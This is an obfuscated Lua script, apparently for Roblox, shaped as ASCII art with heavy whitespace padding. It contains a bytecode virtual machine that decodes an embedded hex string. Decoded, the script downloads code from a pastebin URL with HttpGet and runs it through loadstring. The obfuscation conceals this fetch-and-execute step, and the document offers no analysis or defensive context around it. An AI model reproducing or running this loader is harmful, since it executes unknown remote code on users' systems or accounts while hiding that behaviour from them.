                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall; 
                                                          local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local       
                                                        function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if  
                                                      (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19   
                                                    then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20 
                                                  (v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==((0 -0) -0)) then v83=( 
                                                  v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-1) -(v32-((1685 -(68 + 997)) -(555 + 64)))) + (932 -(857 + (   
                                                1711 -(1523 + 114)))))) ;return v83-(v83%(569 -(367 + 201))) ;end end else local v84=(929 -(214 + 713)) 
                                                ^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0 + 0)) or (877 -(282 + 595)) ;end end local    
                                              function v21()local v34=117 -(32 + 85) ;local v35;while true do if ((1 + 0)==v34) then return v35;end if (v34 
                                              ==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22() 
                                            local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 ;return (v37 * (469 -213)) + v36 ;end local function v23()    
                                            local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(181 -(67 + 113))) then   
                                          return (v42 * ((22315877 -10013600) + (12048049 -7573110))) + (v41 * 65536) + (v40 * (628 -372)) + v39 ;end if (v38==(0 
                                           + 0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + ((1008 -(915 + 82)) -8) );v18=v18 + 4 ;v38=953 -(802 + 150) ;end end end 
                                           local function v24()local v43=v23();local v44=v23();local v45=431 -(44 + 386) ;local v46=(v20(v44,2 -1 ,12 + 8 ) * ((2 -0) 
                                          ^((2966 -(760 + 987)) -(1069 + (2031 -(1789 + 124)))))) + v43 ;local v47=v20(v44,1159 -(116 + 1022) ,70 -39 );local v48=((  
                                        v20(v44,69 -(803 -(745 + 21)) )==(1 + 0)) and  -(1 + 0 + 0)) or (1 -0) ;if (v47==(0 + 0)) then if (v46==(859 -(814 + 45))) then 
                                         return v48 * (791 -(368 + 423)) ;else local v89=0 + 0 ;while true do --[[==============================]] if (v89==(0 + 0)) then 
                                         v47=3 -2 ;v45=18 -(10 + 8) ;break;end end end elseif (v47  --[[============================================]]==(7874 -5827))     
                                        then return ((v46==(1423 -(630 + 793))) and (v48 * ((   --[[======================================================]]443 -(416 + 26) 
                                      )/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-((  --[[==========================================================]]1210 -770) + (    
                                      2286 -1703)) ) * (v45 + (v46/(((1 + 2) -(1 + 0))^(  --[[==============================================================]]490 -(145 + 293 
                                      ))))) ;end local function v25(v49)local v50=1055 -( --[[================================================================]]87 + 968) ;     
                                      local v51;local v52;while true do if (v50==0) then  --[[==================================================================]]v51=nil;if    
                                      not v49 then local v96=(0 + 0) -0 ;while true do if --[[==================================================================]] (v96==(0 -0))    
                                    then v49=v23();if (v49==(0 + 0)) then return "";end   --[[====================================================================]]break;end end 
                     end v50=2 -1 ;end if (v50==(17 -(9 + 5))) then return v6(v52);end if --[[====================================================================]] (v50==(2 + 0)) 
               then v52={};for v90=(256 -(163 + 91)) -1 , #v51 do v52[v90]=v2(v1(v3(v51,  --[[======================================================================]]v90,v90)));   
            end v50=1416 -((2377 -(1869 + 61)) + 966) ;end if (v50==(3 -2)) then v51=v3(  --[[======================================================================]]v16,v18,(v18  
          + v49) -(2 -1) );v18=v18 + v49 ;v50=1819 -(1703 + 114) ;end end end local v26=  --[[======================================================================]]v23;local     
        function v27(...)return {...},v12("#",...);end local function v28()local v53=0;   --[[======================================================================]]local v54;    
        local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53 --[[======================================================================]]~=(3 + 0))    
      then else v60=nil;while true do if (v54==1) then local v97=0;while true do if (v97  --[[======================================================================]]~=0) then     
      else local v135=1467 -(899 + 568) ;while true do if (v135~=(1 + 0)) then else v97=1;  --[[==================================================================]]break;end if (( 
      0 -0)~=v135) then else v59=v23();v60={};v135=604 -(268 + 335) ;end end end if (v97~=1 --[[================================================================]]) then else local 
     v136=0;while true do if (v136==0) then for v145=1,v59 do local v146=0;local v147;local --[[==============================================================]] v148;local v149; 
    local v150;while true do if (v146==(292 -(60 + 230))) then while true do if (v147==0)     --[[==========================================================]]then local v158=572 
     -(426 + 146) ;local v159;while true do if (v158==(0 + 0)) then v159=1456 -(282 + 1174) ;   --[[====================================================]]while true do if (v159  
    ==(811 -(569 + 242))) then local v172=0;while true do if (1==v172) then v159=2 -1 ;break;end  --[[==============================================]]if (v172~=0) then else    
    v148=0 + 0 ;v149=nil;v172=1025 -(706 + 318) ;end end end if (v159==1) then v147=1;break;end end   --[[====================================]]break;end end end if ((1252 - 
    (721 + 530))~=v147) then else v150=nil;while true do if (v148==1) then if (v149==(1272 -(945 + 326))) --[[========================]] then v150=v21()~=0 ;elseif (v149==(4 
     -2)) then v150=v24();elseif (v149==3) then v150=v25();end v60[v145]=v150;break;end if (v148==0) then local v164=0;local v165;while true do if (v164==0) then v165=0 +  
  0 ;while true do if (v165==(700 -(271 + 429))) then v149=v21();v150=nil;v165=1;end if (v165==(1 + 0)) then v148=1501 -(1408 + 92) ;break;end end break;end end end end  
  break;end end break;end if (v146~=(1087 -(461 + 625))) then else v149=nil;v150=nil;v146=1290 -(993 + 295) ;end if (v146==(0 + 0)) then v147=1171 -(418 + 753) ;v148=  
  nil;v146=1 + 0 ;end end end v58[1 + 2 ]=v21();v136=1 + 0 ;end if (v136==(1 + 0)) then v97=2;break;end end end if (v97==2) then v54=531 -(406 + 123) ;break;end end end  
  if (v54==(1769 -(1749 + 20))) then local v98=0;while true do if (v98~=0) then else v55={};v56={};v98=1;end if (v98==(1 + 1)) then v54=1;break;end if (v98==(1323 -(1249 
   + 73))) then v57={};v58={v55,v56,nil,v57};v98=2;end end end if (v54==2) then for v99=1,v23() do local v100=0 + 0 ;local v101;local v102;while true do if ((1145 -(466  
  + 679))==v100) then v101=0 -0 ;v102=nil;v100=2 -1 ;end if (v100==(1901 -(106 + 1794))) then while true do if (0==v101) then v102=v21();if (v20(v102,1 + 0 ,1)==0) then  
  local v151=0 + 0 ;local v152;local v153;local v154;local v155;while true do if (v151~=1) then else v154=nil;v155=nil;v151=5 -3 ;end if (v151==0) then v152=0;v153=nil;  
  v151=2 -1 ;end if (2~=v151) then else while true do if (v152~=0) then else local v160=114 -(4 + 110) ;while true do if (v160==1) then v152=1;break;end if (v160~=(584 - 
  (57 + 527))) then else local v171=0;while true do if (v171~=(1428 -(41 + 1386))) then else v160=1;break;end if (v171==(103 -(17 + 86))) then v153=v20(v102,2 + 0 ,6 -3  
  );v154=v20(v102,11 -7 ,6);v171=167 -(122 + 44) ;end end end end end if (v152==3) then if (v20(v154,5 -2 ,9 -6 )==(1 + 0)) then v155[4]=v60[v155[4]];end v55[v99]=v155;  
  break;end if (v152==(1 + 1)) then local v162=0 -0 ;while true do if (v162==(65 -(30 + 35))) then if (v20(v154,1 + 0 ,1)==(1258 -(1043 + 214))) then v155[2]=v60[v155[7  
  -5 ]];end if (v20(v154,1214 -(323 + 889) ,5 -3 )~=1) then else v155[583 -(361 + 219) ]=v60[v155[3]];end v162=321 -(53 + 267) ;end if (v162==1) then v152=1 + 2 ;break;end 
   end end if (v152==1) then v155={v22(),v22(),nil,nil};if (v153==(0 -0)) then local v168=0 + 0 ;local v169;local v170;while true do if (1==v168) then while true do if (0  
  ~=v169) then else v170=0 + 0 ;while true do if (v170==0) then v155[3]=v22();v155[854 -(20 + 830) ]=v22();break;end end break;end end break;end if (v168~=(0 + 0)) then    
  else v169=126 -(116 + 10) ;v170=nil;v168=1 + 0 ;end end elseif (v153==1) then v155[3]=v23();elseif (v153==(740 -(542 + 196))) then v155[3]=v23() -(2^(34 -18)) ;elseif (  
  v153~=(1 + 2)) then else local v179=0 + 0 ;local v180;local v181;while true do if (v179==(0 + 0)) then v180=0;v181=nil;v179=1;end if ((2 -1)==v179) then while true do if 
   (v180~=(0 -0)) then else v181=1551 -(1126 + 425) ;while true do if (v181==(405 -(118 + 287))) then v155[11 -8 ]=v23() -(2^16) ;v155[4]=v22();break;end end break;end end 
   break;end end end v152=1123 -(118 + 1003) ;end end break;end end end break;end end break;end end end for v103=1,v23() do v56[v103-1 ]=v28();end return v58;end end break 
  ;end if (v53~=0) then else v54=0 -0 ;v55=nil;v53=378 -(142 + 235) ;end if ((4 -3)==v53) then v56=nil;v57=nil;v53=2;end if (v53~=(1 + 1)) then else v58=nil;v59=nil;v53=   
  980 -(553 + 424) ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69 
  =v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[   
  v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=3) then if (v80<= 
  1) then if (v80>0) then local v105;local v106,v107;local v108;local v109;v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[  
  v71];v109=v79[2];v108=v77[v79[3]];v77[v109 + 1 ]=v108;v77[v109]=v108[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v109=v79[2];v106,v107 
  =v70(v77[v109](v13(v77,v109 + 1 ,v79[3])));v72=(v107 + v109) -1 ;v105=0;for v137=v109,v72 do local v138=0;while true do if (v138==0) then v105=v105 + 1 ;v77[v137]=v106 
  [v105];break;end end end v71=v71 + 1 ;v79=v67[v71];v109=v79[2];v77[v109]=v77[v109](v13(v77,v109 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67 
  [v71];do return;end else v77[v79[2]]();end elseif (v80>2) then local v119=v79[2];v77[v119]=v77[v119](v13(v77,v119 + 1 ,v72));else local v121=0;local v122;local v123;   
    local v124;local v125;while true do if (v121==2) then for v143=v122,v72 do local v144=0;while true do if (0==v144) then v125=v125 + 1 ;v77[v143]=v123[v125];break;end 
     end end break;end if (v121==1) then v72=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==0) then v122=v79[2];v123,v124=v70(v77[v122](v13(v77,v122 + 1 ,v79[3])));v121=1 
    ;end end end elseif (v80<=5) then if (v80==4) then v77[v79[2]]=v63[v79[3]];else v77[v79[2]]=v79[3];end elseif (v80>6) then do return;end else local v130=v79[2];local 
     v131=v77[v79[3]];v77[v130 + 1 ]=v131;v77[v130]=v131[v79[4]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15(                                      
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                        
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


--------------------------------------------------------------------------------
"LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031D3O00682O7470733A2O2F706173746562696E2E636F6D2F3637796833514C3600083O0012013O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
